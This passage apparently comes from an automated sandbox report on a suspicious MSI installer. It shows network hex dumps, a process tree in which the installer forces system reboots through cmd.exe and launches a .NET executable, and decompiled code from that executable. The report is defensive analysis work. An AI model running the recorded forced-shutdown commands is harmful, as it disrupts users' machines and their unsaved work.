f3 7e 40 44 67 e2 0d 31 24 4e dd c1 4b de e9 69 73 3e e0 44 e2 11 c2 47 c6 44 a8 99 d8 14 84 99 25 Data Ascii: &]fCR+o4\|CRg,U"P3L}^@ >mA?!;O\|eNmKC4M4MgOWs#pA<kF^/i7d#yA,FFX;#]@AZQMcgla$Sj>7KZvQ.@b3"1\]YH/x~@Dg1$NKis>DGD%
2023-01-03 15:29:21 UTC	1838	IN	Data Raw: 06 48 bc f4 26 6c c0 20 b8 c2 25 1c 95 2c e9 84 43 34 4b ca b0 62 1a 1c d1 0c 53 9a a2 8a 38 43 c5 64 01 c4 e6 9c 8c 50 9c 24 45 8d 2e f6 d7 4c c4 18 1a 27 7e 8c e3 29 97 30 4d 2e 56 77 05 bd c6 53 1e 12 4d ec c2 9b 5a 54 25 68 3f d4 63 bc 46 2a 6f 26 ea a3 09 4a 8e 22 b0 3d 06 64 3b 42 d0 0c 53 a8 33 4d 01 ff 62 54 02 c4 a8 06 f6 00 3a 55 20 66 25 59 5f 42 10 0e f3 a0 59 bb 60 0b 7b 48 7a 8e a1 05 08 4c d3 24 35 15 33 1a 99 1a 0a ed 62 5d a3 04 da 7b 04 ca 3d 88 02 39 e2 c2 0a 03 e1 08 b4 e2 0c c2 4d 84 79 d1 e6 42 84 e0 f5 a5 4d 5d 50 03 65 b3 34 25 2a ba 7a 27 0f 7d a6 4c f1 c9 29 d4 c7 6b ac 4e 87 7a 88 29 aa c8 09 7c c1 06 d0 51 0c 96 cb 19 a4 67 5d fb 1c 80 25 eb 21 9a 3c 05 77 8f 91 b1 3a 84 aa d3 66 05 49 03 06 54 e1 34 fa e1 45 ed 52 c5 f0 4a 9f Data Ascii: H&l %,C4KbS8CdP$E.L'~)0M.VwSMZT%h?cFo&J"=d;BS3MbT:U f%Y_BY`{HzL$53b]{=9MyBM]Pe4%z'}L)kNz)\|Qg]%!<w:fIT4ERJ
2023-01-03 15:29:21 UTC	1839	IN	Data Raw: 2b 6a 80 e3 64 45 f3 c0 79 c7 cc b2 00 b1 9d ee be 1d 02 35 2a 32 ea cf c9 a3 1e d3 5a 4c 37 b0 71 90 c5 69 e0 30 b7 2c 5a 88 64 68 5a 8c 26 19 b1 1d 4b ee 2b c4 7f 5d 28 d8 07 90 fb 27 2c dd 5a af 36 08 51 2a ca cc 8b e2 12 1c e1 df 55 98 3f 7d d2 19 53 92 cf 0e f8 f5 0d a3 18 b6 6f 7a 6a 9c a1 8b 18 27 ba 71 22 09 7c 46 c9 41 0f 67 b8 c6 8c 3c 24 c5 5c e3 1e 0d d1 06 98 e1 21 ce 60 d1 7b 18 71 41 08 25 53 ea 05 bf 6c fc d7 a6 30 bf 42 8e a2 0b ff f1 02 d0 79 40 ce 2a 83 94 44 91 a8 77 0f d8 dd 47 8a b1 4a 52 7c 07 42 9f 93 23 cf 90 ef 08 11 b3 bb b1 01 17 8c a2 3e 31 63 11 37 ab 8b 72 75 99 a2 b7 0e b5 b4 7e 4a 92 ae 51 0b 9b 01 8c 0f 29 e6 89 a1 59 99 30 a4 ae 19 58 87 6e b8 75 46 04 3c 02 2d b8 a4 e0 4d 40 f8 b4 11 89 29 22 69 db 46 26 40 b7 c4 9a 51 Data Ascii: +jdEy52ZL7qi0,ZdhZ&K+](',Z6QU?}Sozj'q"\|FAg<$\!`{qA%Sl0By@*DwGJR\|B#>1c7ru~JQ)Y0XnuF<-M@)"iF&@Q
2023-01-03 15:29:21 UTC	1855	IN	Data Raw: d8 aa 01 6c bf f9 58 fe 72 a9 f1 e7 7a ba fd 50 3e b3 a6 56 25 fb 63 f5 9c 5a 74 6e 3e 56 a7 e0 12 6b fa 78 8b 6b ef 52 e3 4b fc 3c fb 9b cb f2 e1 1f 72 4e fc b2 bb 36 fb 2c 54 5d bb 4b 4e 51 ee 89 4b 2f b8 2e b1 d1 2e 4c a7 eb c1 fb bc 53 8c ac 4b 3e 75 f3 eb ea 52 2f 6d 19 bf e0 e6 b7 65 41 e6 b7 2c d6 9b 2d 71 13 96 e5 f7 86 7a d7 43 ed 34 dc fc 8e fd 4d fd ee df d1 3e d3 e6 cd ef 9a 8f fd ae fd 4d e5 e1 88 17 6a 93 eb f5 6b 0f 95 c7 a0 6e 99 9a ec bf 26 d7 f6 d7 96 70 58 df d6 33 66 99 23 e2 8f 75 fb bb ea 0a 3c e6 aa ff f0 a1 dc 68 f5 5b cc a9 7a e2 b1 f8 5f 37 3f 94 23 7e 6c 53 d7 f8 f7 d5 41 ff 96 9c fc 7f a4 0c b1 6d 6b 6b 55 6d d5 33 fa c9 e7 4d d9 7c ac 76 d6 5c 79 f0 33 37 ff a7 15 b9 14 37 3f 54 47 f3 68 fb 9e 7e a0 0d b1 ba b4 6b 6a a5 b8 f9 Data Ascii: lXrzP>V%cZtn>VkxkRK<rN6,T]KNQK/..LSK>uR/meA,-qzC4M>Mjkn&pX3f#u<h[z_7?#~lSAmkkUm3M\|v\y377?TGh~kj
2023-01-03 15:29:21 UTC	1856	IN	Data Raw: c4 cb 4f d4 d2 23 0b a8 5a 80 de 57 7b 96 57 47 f8 ca 37 7f 61 c3 b7 ed 5a 65 12 3c ef 6f 89 db 2a e1 d4 b2 0a da c5 b8 48 74 a4 a7 e9 48 8c 63 79 6b 4b 3b e0 cb f6 b2 9a 0e b8 3d cf b6 6c cc e0 d1 16 47 35 12 93 f8 91 72 68 b4 89 b4 49 98 c3 f2 7e f3 07 5b 1b e2 7b 3c ff d8 76 fb 8c 0e 87 b4 df ae ec af c0 06 36 f1 00 64 21 91 07 4f 2c 36 fb 63 f5 09 b1 69 6b 1b 6a 16 b2 84 2f af 2b 0b 26 d3 fb 23 33 93 9f ff 40 4e e9 86 99 fc fc 07 e6 cf be 8c f1 3f e6 ca 2a e3 7b f3 43 63 d2 d7 64 9a 6c c9 49 d9 1f 4b 58 72 df 86 63 a0 d7 08 f5 50 5d 72 9e b1 6d 2f c9 fd c0 f3 50 56 92 8b f0 e2 8f 1f 89 8d 31 e6 4b 59 b6 75 ce 42 59 f5 65 73 0a 6b 62 05 9e 7f 2c f6 46 f6 66 a2 9f c7 fc ee da 1f bf b1 6d e3 b7 6d 79 93 2f 51 f7 d8 b7 18 0d 2a 40 7c bc 66 79 20 8f d5 23 Data Ascii: O#ZW{WG7aZe<oHtHcykK;=lG5rhI~[{<v6d!O,6cikj/+&#3@N?{CcdlIKXrcP]rm/PV1KYuBYeskb,Ffmmy/Q*@\|fy #

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exePID: 1508, Parent PID: 3320

General

Target ID:	0
Start time:	16:29:09
Start date:	03/01/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\DRTO10179793.msi"
Imagebase:	0x7ff645c00000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 5652, Parent PID: 552

General

Target ID:	1
Start time:	16:29:10
Start date:	03/01/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff645c00000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 3628, Parent PID: 5652

General

Target ID:	2
Start time:	16:29:11
Start date:	03/01/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding B01AEABFCA46B3B3EA82AAB1A28EDDAD
Imagebase:	0x840000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1556, Parent PID: 3628

General

Target ID:	4
Start time:	16:29:33
Start date:	03/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60
Imagebase:	0xa60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1124, Parent PID: 1556

General

Target ID:	5
Start time:	16:29:33
Start date:	03/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5504, Parent PID: 3628

General

Target ID:	6
Start time:	16:29:33
Start date:	03/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f
Imagebase:	0xa60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5568, Parent PID: 5504

General

Target ID:	7
Start time:	16:29:33
Start date:	03/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: shutdown.exePID: 5468, Parent PID: 1556

General

Target ID:	9
Start time:	16:29:34
Start date:	03/01/2023
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown -r -f -t 60
Imagebase:	0x9e0000
File size:	23552 bytes
MD5 hash:	E2EB9CC0FE26E28406FB6F82F8E81B26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: shutdown.exePID: 4968, Parent PID: 5504

General

Target ID:	10
Start time:	16:29:34
Start date:	03/01/2023
Path:	C:\Windows\SysWOW64\shutdown.exe
Wow64 process (32bit):	true
Commandline:	shutdown /r /t 1 /f
Imagebase:	0x9e0000
File size:	23552 bytes
MD5 hash:	E2EB9CC0FE26E28406FB6F82F8E81B26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: fQQPwD.exePID: 2716, Parent PID: 3320

General

Target ID:	16
Start time:	16:29:43
Start date:	03/01/2023
Path:	C:\Users\user\fQQPwD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\fQQPwD.exe"
Imagebase:	0x60000
File size:	837032 bytes
MD5 hash:	E90BBFCDFDA75CB22FEDF1B94F8F20F6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: fQQPwD.exePID: 2716, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.6%
Total number of Nodes:	219
Total number of Limit Nodes:	36

Executed Functions

Function 000B3550 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 581
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E000B3550(void* __ebx, void* __edi, void* __fp0, intOrPtr _a4, unsigned int _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _t214;
				signed int _t217;
				char _t223;
				intOrPtr _t225;
				void* _t226;
				signed char _t227;
				signed int _t241;
				signed int _t242;
				intOrPtr* _t243;
				signed int _t250;
				void* _t256;
				signed char _t257;
				intOrPtr* _t276;
				intOrPtr _t283;
				intOrPtr* _t302;
				intOrPtr _t308;
				signed int _t324;
				signed int _t326;
				intOrPtr _t330;
				void* _t335;
				intOrPtr* _t336;
				signed int* _t338;
				unsigned int _t339;
				signed int _t340;
				intOrPtr* _t342;
				signed int _t344;
				intOrPtr _t345;
				signed int _t349;
				signed int _t351;
				intOrPtr* _t352;
				intOrPtr _t353;
				void* _t355;
				signed char _t359;
				signed int* _t367;
				void* _t372;
				signed char _t376;
				intOrPtr* _t385;
				intOrPtr _t393;
				intOrPtr _t394;
				unsigned int _t396;
				intOrPtr _t404;
				intOrPtr _t405;
				intOrPtr _t406;
				unsigned int _t407;
				signed int _t409;
				signed int _t422;
				intOrPtr* _t423;
				signed int _t427;
				signed int _t432;
				signed int _t439;
				signed int _t447;
				signed int _t449;
				unsigned int _t453;
				char* _t455;
				signed int _t456;
				signed int _t460;
				signed int _t463;
				intOrPtr _t465;
				void* _t468;
				void* _t469;

				_t493 = __fp0;
				_push(__ebx);
				_push(__edi);
				_t469 = _t468 - 0xc;
				_t330 = _a12;
				_t453 = _a8;
				if(_t330 == 0) {
					_t415 = 0;
					if(_t453 == 0) {
						goto L43;
					} else {
						asm("prefetcht0 [esi]");
						_t214 = _t453 & 0xffe00000;
						_t447 =  *(_t214 + 0x1000);
						_t349 = _t453 >> 0x00000009 & 0x00000fe0;
						_t217 = ( *(_t214 + _t349 + 0x101e) & 0x3f) << 5;
						_t351 = _t453 -  *((intOrPtr*)(_t447 + 0x10));
						_t334 = _t214 + _t349 + 0x1000 - _t217;
						_v20 = _t214 + _t349 + 0x1000 - _t217;
						asm("prefetcht0 [ebx]");
						_v24 = _t351;
						if( *_t447 == 2) {
							if(( *0x123d89 & 1) != 0) {
								L000B7BD0(_t334, __fp0);
								_t351 = _v24;
								_t415 = 0;
							}
							_t217 = _t351 >> 0x15;
							if( *((short*)(_t217 + _t217 + 0x122d24)) != 0xfffe) {
								goto L26;
							} else {
								_t396 = _t453;
								_t439 = _v20;
								_t308 =  *((intOrPtr*)(_t439 + 8));
								if(( *(_t439 + 0xf) & 0x00000008) != 0) {
									_v20 = _v20 + 0x20;
								} else {
									_v20 = _t308 + 0xc;
								}
								_t465 =  *((intOrPtr*)(_t308 + 0xc));
								if( *0x123d8b == 1) {
									E000E11A0(_t396, _t396, 0,  *_v20 -  *((intOrPtr*)(_t447 + 0xc)));
									_t469 = _t469 + 0xc;
								}
								asm("lock and [edx+ecx+0x4000], eax");
								asm("lock xadd [0x123d6c], eax");
								_t404 =  *0x123d70; // 0x100000
								if(_t465 + _t465 > _t404) {
									_t405 =  *0x123d84; // 0x123d78
									if(E000CB6F0(_t405) != 0 && ( *0x123d88 & 0x000000ff) == 0) {
										L000B7B60(_t493, 1);
										_t469 = _t469 + 4;
									}
								}
								goto L42;
							}
						} else {
							L26:
							if( *((char*)(_t447 + 6)) == 0) {
								L35:
								if( *((char*)(_t447 + 3)) == 0) {
									L78:
									_t455 = _v24;
									 *_t455 = 0;
									_t335 = _t447 + 0x40;
									__imp__TryAcquireSRWLockExclusive(_t335);
									if(_t217 == 0) {
										L000A8B90(_t217, _t335);
									}
									_t352 = _v20;
									 *((intOrPtr*)(_t447 + 0x117c)) =  *((intOrPtr*)(_t447 + 0x117c)) -  *((intOrPtr*)( *((intOrPtr*)(_t352 + 8)) + 0xc));
									_t223 =  *_t352;
									if(_t223 == _t455) {
										goto L107;
									} else {
										asm("bswap eax");
										 *_t455 = _t223;
										 *_t352 = _t455;
										_t227 =  *(_t352 + 0xc);
										_t415 = _t227 & 0xefffffff;
										 *(_t352 + 0xc) = _t227 & 0xefffffff;
										if((_t227 & 0x00003ffe) == 0) {
											goto L108;
										} else {
											_t460 = _t227 + 0x00003ffe & 0x00003ffe;
											 *(_t352 + 0xc) = _t227 & 0xefffc001 | _t460;
											if((_t227 & 0x00000001) != 0 || _t460 == 0) {
												L00072150(_t352, _t493, 1);
											}
											__imp__ReleaseSRWLockExclusive(_t335);
											goto L42;
										}
									}
								} else {
									_t217 =  *(_v20 + 8);
									_t355 = _t447 + 0x48;
									if(_t355 > _t217) {
										goto L78;
									} else {
										_t415 = _t447 + 0x1148;
										if(_t447 + 0x1148 < _t217) {
											goto L78;
										} else {
											_t422 =  *0x123e38; // 0x0
											_t415 =  *( *[fs:0x2c] + _t422 * 4);
											_t336 =  *((intOrPtr*)( *( *[fs:0x2c] + _t422 * 4) + 0xa0));
											if(_t336 < 2) {
												goto L78;
											} else {
												_t217 = _t217 - _t355 >> 5;
												 *((intOrPtr*)(_t336 + 0x30)) =  *((intOrPtr*)(_t336 + 0x30)) + 1;
												asm("adc dword [ebx+0x34], 0x0");
												if(_t217 > ( *0x122d20 & 0x0000ffff)) {
													 *((intOrPtr*)(_t336 + 0x40)) =  *((intOrPtr*)(_t336 + 0x40)) + 1;
													asm("adc dword [ebx+0x44], 0x0");
													goto L78;
												} else {
													asm("bswap ecx");
													_t423 = _v24;
													 *_t423 =  *((intOrPtr*)(_t336 + 0x58 + _t217 * 8));
													 *((intOrPtr*)(_t336 + 0x58 + _t217 * 8)) = _t423;
													 *((char*)(_t336 + 0x5c + _t217 * 8)) =  *((char*)(_t336 + 0x5c + _t217 * 8)) + 1;
													 *_t336 =  *_t336 + ( *(_t336 + 0x5e + _t217 * 8) & 0x0000ffff);
													 *((intOrPtr*)(_t336 + 0x38)) =  *((intOrPtr*)(_t336 + 0x38)) + 1;
													asm("adc dword [ebx+0x3c], 0x0");
													_t359 =  *(_t336 + 0x5d + _t217 * 8) & 0x000000ff;
													if( *((intOrPtr*)(_t336 + 0x5c + _t217 * 8)) > _t359) {
														_push((_t359 & 0x000000ff) >> 1);
														_push(_t336 + _t217 * 8 + 0x58);
														E000A87A0(_t336, _t336, _t447);
													}
													if(( *(_t336 + 4) & 1) != 0) {
														L000A7E00(_t336);
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								if((_t351 & 0x00000fff) == 0) {
									_t338 = (_v24 >> 0x00000009 & 0x00000ff8) + (_t351 & 0xffe00000) + 0x2000;
								} else {
									_t338 = _t351 - 4;
								}
								if(( *_t338 & 0x7fffffff) != 1 &&  *((char*)(_t447 + 7)) != 0) {
									if(( *(_v20 + 0xf) & 0x00000008) != 0) {
										_t302 = _v20 + 0x20;
									} else {
										_t302 =  *(_v20 + 8) + 0xc;
									}
									E000E11A0(_t447, _t453, 0xef,  *_t302 -  *((intOrPtr*)(_t447 + 0xc)));
									_t469 = _t469 + 0xc;
									_t415 = 0;
								}
								_t241 =  *_t338;
								do {
									asm("lock cmpxchg [ebx], ecx");
								} while ((_t241 & 0xfffffffe) != 0);
								if((_t241 & 0x00000001) == 0) {
									goto L45;
								} else {
									_t217 = _t241 & 0x7fffffff;
									if(_t217 != 1) {
										asm("lock add [edi+0x1198], eax");
										asm("lock inc dword [edi+0x119c]");
										asm("lock add [edi+0x11a0], eax");
										asm("lock inc dword [edi+0x11a4]");
										goto L43;
									} else {
										goto L35;
									}
								}
							}
						}
					}
				} else {
					_t406 = _a16;
					if(_t330 + (( *0x133ec0 & 0x000000ff) << 3) < 0) {
						asm("int3");
						_t338 = 0;
					}
					_t324 = L000B29D0(_t406, _t338);
					if(_t324 == 0) {
						L42:
						_t415 = 0;
						goto L43;
					} else {
						_t415 = _t324;
						if(_t453 == 0) {
							L43:
							return _t415;
						} else {
							_t326 = _t453 & 0xffe00000;
							_t407 = _t453;
							_t453 = _t326 + 0x1000;
							_t409 = _t407 >> 0x00000009 & 0x00000fe0;
							_t447 = _t326 + _t409 + 0x1000;
							_t242 = _t447 - (( *(_t326 + _t409 + 0x101e) & 0x3f) << 5);
							_t367 =  *(_t242 & 0xffe01000);
							if(( *(_t242 + 0xf) & 0x00000008) != 0) {
								L46:
								_t243 = _t242 + 0x20;
							} else {
								_t243 =  *((intOrPtr*)(_t242 + 8)) + 0xc;
							}
							_t246 =  >=  ? _t338 :  *_t243 - _t367[3];
							_t339 = _a8;
							_v20 = _t415;
							L000E0C20(_t415, _t339,  >=  ? _t338 :  *_t243 - _t367[3]);
							_t469 = _t469 + 0xc;
							asm("prefetcht0 [ebx]");
							_t455 =  *_t453;
							_t250 = ( *(_t447 + 0x1e) & 0x3f) << 5;
							_t427 = _t339 -  *((intOrPtr*)(_t455 + 0x10));
							_t447 = _t447 - _t250;
							asm("prefetcht0 [edi]");
							if( *_t455 == 2) {
								if(( *0x123d89 & 1) != 0) {
									_t340 = _t447;
									L000B7BD0(_t340, _t493);
									_t415 = _t427;
									_t447 = _t340;
								}
								_t250 = _t415 >> 0x15;
								if( *((short*)(_t250 + _t250 + 0x122d24)) != 0xfffe) {
									goto L7;
								} else {
									_t344 = _t447;
									_t449 = _t415;
									_t283 =  *((intOrPtr*)(_t344 + 8));
									if(( *(_t344 + 0xf) & 0x00000008) != 0) {
										_t385 = _t344 + 0x20;
									} else {
										_t385 = _t283 + 0xc;
									}
									_t345 =  *((intOrPtr*)(_t283 + 0xc));
									if( *0x123d8b == 1) {
										E000E11A0(_t449, _a8, 0,  *_t385 -  *((intOrPtr*)(_t455 + 0xc)));
										_t469 = _t469 + 0xc;
									}
									asm("lock and [edx+ecx+0x4000], eax");
									asm("lock xadd [0x123d6c], eax");
									_t393 =  *0x123d70; // 0x100000
									if(_t345 + _t345 > _t393) {
										_t394 =  *0x123d84; // 0x123d78
										if(E000CB6F0(_t394) != 0 && ( *0x123d88 & 0x000000ff) == 0) {
											L000B7B60(_t493, 1);
											_t469 = _t469 + 4;
										}
									}
									goto L23;
								}
							} else {
								L7:
								if( *((char*)(_t455 + 6)) == 0) {
									L16:
									_v24 = _t447;
									_t447 = _t415;
									if( *((char*)(_t455 + 3)) == 0) {
										L58:
										 *_t447 = 0;
										_t335 = _t455 + 0x40;
										__imp__TryAcquireSRWLockExclusive(_t335);
										if(_t250 == 0) {
											L000A8B90(_t250, _t335);
										}
										_t415 = _v24;
										 *((intOrPtr*)(_t455 + 0x117c)) =  *((intOrPtr*)(_t455 + 0x117c)) -  *((intOrPtr*)( *((intOrPtr*)(_t415 + 8)) + 0xc));
										_t256 =  *_t415;
										if(_t256 == _t447) {
											asm("int3");
											asm("ud2");
											goto L106;
										} else {
											asm("bswap eax");
											 *_t447 = _t256;
											 *_t415 = _t447;
											_t257 =  *(_t415 + 0xc);
											 *(_t415 + 0xc) = _t257 & 0xefffffff;
											if((_t257 & 0x00003ffe) == 0) {
												L106:
												asm("int3");
												asm("ud2");
												L107:
												asm("int3");
												asm("ud2");
												L108:
												asm("int3");
												asm("ud2");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t455);
												_t456 = _v20;
												_t353 =  *0x1315c0; // 0x131600
												if(_t353 == 0) {
													_t353 = E000B4240(_t335, _t415, _t447);
												}
												_t225 = _a4;
												_t457 = _t456 + (( *0x133ec0 & 0x000000ff) << 3);
												if(_t456 + (( *0x133ec0 & 0x000000ff) << 3) < 0) {
													asm("int3");
													_t457 = 0;
												}
												_t226 = L000B9AB0(_t353, 0x10, _t225, _t457, 0x10fc87); // executed
												return _t226;
											} else {
												_t370 = _t415;
												_t463 = _t257 + 0x00003ffe & 0x00003ffe;
												 *(_t415 + 0xc) = _t257 & 0xefffc001 | _t463;
												if((_t257 & 0x00000001) != 0 || _t463 == 0) {
													L00072150(_t370, _t493, 1);
												}
												__imp__ReleaseSRWLockExclusive(_t335);
												goto L23;
											}
										}
									} else {
										_t250 =  *(_v24 + 8);
										_t372 = _t455 + 0x48;
										if(_t372 > _t250 || _t455 + 0x1148 < _t250) {
											goto L58;
										} else {
											_t432 =  *0x123e38; // 0x0
											_t342 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t432 * 4)) + 0xa0));
											if(_t342 < 2) {
												goto L58;
											} else {
												_t250 = _t250 - _t372 >> 5;
												 *((intOrPtr*)(_t342 + 0x30)) =  *((intOrPtr*)(_t342 + 0x30)) + 1;
												asm("adc dword [ebx+0x34], 0x0");
												if(_t250 > ( *0x122d20 & 0x0000ffff)) {
													 *((intOrPtr*)(_t342 + 0x40)) =  *((intOrPtr*)(_t342 + 0x40)) + 1;
													asm("adc dword [ebx+0x44], 0x0");
													goto L58;
												} else {
													asm("bswap ecx");
													 *_t447 =  *(_t342 + 0x58 + _t250 * 8);
													 *(_t342 + 0x58 + _t250 * 8) = _t447;
													 *((char*)(_t342 + 0x5c + _t250 * 8)) =  *((char*)(_t342 + 0x5c + _t250 * 8)) + 1;
													 *_t342 =  *_t342 + ( *(_t342 + 0x5e + _t250 * 8) & 0x0000ffff);
													 *((intOrPtr*)(_t342 + 0x38)) =  *((intOrPtr*)(_t342 + 0x38)) + 1;
													asm("adc dword [ebx+0x3c], 0x0");
													_t376 =  *(_t342 + 0x5d + _t250 * 8) & 0x000000ff;
													if( *((intOrPtr*)(_t342 + 0x5c + _t250 * 8)) > _t376) {
														_push((_t376 & 0x000000ff) >> 1);
														_push(_t342 + _t250 * 8 + 0x58);
														E000A87A0(_t342, _t342, _t447);
													}
													if(( *(_t342 + 4) & 1) != 0) {
														L000A7E00(_t342);
													}
													goto L23;
												}
											}
										}
									}
								} else {
									if((_t415 & 0x00000fff) == 0) {
										_t338 = (_t415 >> 0x00000009 & 0x00000ff8) + (_t415 & 0xffe00000) + 0x2000;
									} else {
										_t338 = _t415 - 4;
									}
									if(( *_t338 & 0x7fffffff) != 1 &&  *((char*)(_t455 + 7)) != 0) {
										_v28 = _t415;
										if(( *(_t447 + 0xf) & 0x00000008) != 0) {
											_t276 = _t447 + 0x20;
										} else {
											_t276 =  *((intOrPtr*)(_t447 + 8)) + 0xc;
										}
										E000E11A0(_t447, _a8, 0xef,  *_t276 -  *((intOrPtr*)(_t455 + 0xc)));
										_t469 = _t469 + 0xc;
										_t415 = _v28;
									}
									_t241 =  *_t338;
									do {
										asm("lock cmpxchg [ebx], ecx");
									} while ((_t241 & 0xfffffffe) != 0);
									if((_t241 & 0x00000001) == 0) {
										L45:
										_t367 = _t338;
										_push(_t241);
										_t242 = E000B41F0(_t338, _t415, _t447);
										goto L46;
									} else {
										_t250 = _t241 & 0x7fffffff;
										if(_t250 != 1) {
											asm("lock add [esi+0x1198], eax");
											asm("lock inc dword [esi+0x119c]");
											asm("lock add [esi+0x11a0], eax");
											asm("lock inc dword [esi+0x11a4]");
											L23:
											_t415 = _v20;
											goto L43;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}

0x000b3550
0x000b3553
0x000b3554
0x000b3556
0x000b3559
0x000b355c
0x000b3561
0x000b371c
0x000b3720
0x00000000
0x000b3726
0x000b3726
0x000b372b
0x000b3730
0x000b373b
0x000b3755
0x000b375a
0x000b375d
0x000b375f
0x000b3762
0x000b3768
0x000b376b
0x000b3a1f
0x000b3ce4
0x000b3ce9
0x000b3cec
0x000b3cec
0x000b3a27
0x000b3a33
0x00000000
0x000b3a39
0x000b3a39
0x000b3a3b
0x000b3a3e
0x000b3a45
0x000b3cf3
0x000b3a4b
0x000b3a4e
0x000b3a4e
0x000b3a51
0x000b3a5b
0x000b3a6b
0x000b3a70
0x000b3a70
0x000b3aa3
0x000b3aad
0x000b3ab7
0x000b3abf
0x000b3ac5
0x000b3ad2
0x000b3ae9
0x000b3aee
0x000b3aee
0x000b3ad2
0x00000000
0x000b3abf
0x000b3771
0x000b3771
0x000b3775
0x000b37c1
0x000b37c5
0x000b3afe
0x000b3afe
0x000b3b01
0x000b3b07
0x000b3b0b
0x000b3b13
0x000b3b17
0x000b3b17
0x000b3b1c
0x000b3b25
0x000b3b2b
0x000b3b2f
0x00000000
0x000b3b35
0x000b3b35
0x000b3b37
0x000b3b39
0x000b3b3b
0x000b3b40
0x000b3b46
0x000b3b4e
0x00000000
0x000b3b54
0x000b3b5a
0x000b3b6a
0x000b3b6f
0x000b3cbe
0x000b3cbe
0x000b3b7e
0x00000000
0x000b3b7e
0x000b3b4e
0x000b37cb
0x000b37ce
0x000b37d1
0x000b37d6
0x00000000
0x000b37dc
0x000b37dc
0x000b37e4
0x00000000
0x000b37ea
0x000b37ea
0x000b37f7
0x000b37fa
0x000b3803
0x00000000
0x000b3809
0x000b380b
0x000b380e
0x000b3812
0x000b381f
0x000b3af6
0x000b3afa
0x00000000
0x000b3825
0x000b3829
0x000b382b
0x000b382e
0x000b3830
0x000b3834
0x000b383d
0x000b383f
0x000b3843
0x000b3847
0x000b3850
0x000b3b96
0x000b3b97
0x000b3b98
0x000b3b98
0x000b385c
0x000b3ba4
0x000b3ba4
0x00000000
0x000b385c
0x000b381f
0x000b3803
0x000b37e4
0x000b37d6
0x000b3777
0x000b377d
0x000b3c11
0x000b3783
0x000b3783
0x000b3783
0x000b3790
0x000b3c8a
0x000b3d07
0x000b3c8c
0x000b3c92
0x000b3c92
0x000b3ca1
0x000b3ca6
0x000b3ca9
0x000b3ca9
0x000b379c
0x000b37a0
0x000b37a5
0x000b37a5
0x000b37ad
0x00000000
0x000b37b3
0x000b37b3
0x000b37bb
0x000b3c25
0x000b3c2c
0x000b3c39
0x000b3c40
0x00000000
0x00000000
0x00000000
0x00000000
